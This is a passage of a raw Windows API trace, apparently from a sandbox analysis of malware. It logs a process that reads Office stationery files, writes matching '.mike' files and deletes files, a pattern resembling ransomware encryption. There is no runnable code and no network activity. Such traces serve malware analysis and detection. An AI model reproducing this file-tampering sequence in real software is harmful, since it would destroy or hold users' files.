Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93a8b00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x21426e0 | out: lpFileInformation=0x21426e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93a8b00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x80) returned 0 [0053.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.581] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93a8b00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.582] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.582] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.582] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike")) returned 1 [0053.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.585] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.586] GetFileType (hFile=0x288) returned 0x1 [0053.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.586] GetFileType (hFile=0x288) returned 0x1 [0053.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.586] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.586] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.586] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2145518 | out: lpFileInformation=0x2145518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906)) returned 1 [0053.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.587] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), fInfoLevelId=0x0, lpFileInformation=0x214584c | out: lpFileInformation=0x214584c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906)) returned 1 [0053.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.587] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.588] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.588] GetFileType (hFile=0x288) returned 0x1 [0053.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.588] GetFileType (hFile=0x288) returned 0x1 [0053.588] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.589] WriteFile (in: hFile=0x288, lpBuffer=0x2146748*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2146748*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.589] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2146228 | out: lpFileInformation=0x2146228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906)) returned 1 [0053.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.590] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.590] GetFileType (hFile=0x288) returned 0x1 [0053.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.590] GetFileType (hFile=0x288) returned 0x1 [0053.590] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.590] ReadFile (in: hFile=0x288, lpBuffer=0x2147884, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2147884*, lpNumberOfBytesRead=0x2af0c8*=0x1906, lpOverlapped=0x0) returned 1 [0053.592] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.592] GetFileType (hFile=0x288) returned 0x1 [0053.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.592] GetFileType (hFile=0x288) returned 0x1 [0053.592] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.593] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.593] GetFileType (hFile=0x288) returned 0x1 [0053.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.593] GetFileType (hFile=0x288) returned 0x1 [0053.594] WriteFile (in: hFile=0x288, lpBuffer=0x2155fb0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2155fb0*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.594] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93cec60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b30)) returned 1 [0053.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.595] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2157730 | out: lpFileInformation=0x2157730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93cec60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b30)) returned 1 [0053.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x80) returned 0 [0053.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.596] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93a8b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93a8b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93cec60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b30)) returned 1 [0053.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x4a [0053.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x4f [0053.597] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.mike")) returned 1 [0053.598] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", lpFilePart=0x0) returned 0x47 [0053.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", lpFilePart=0x0) returned 0x49 [0053.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecac, 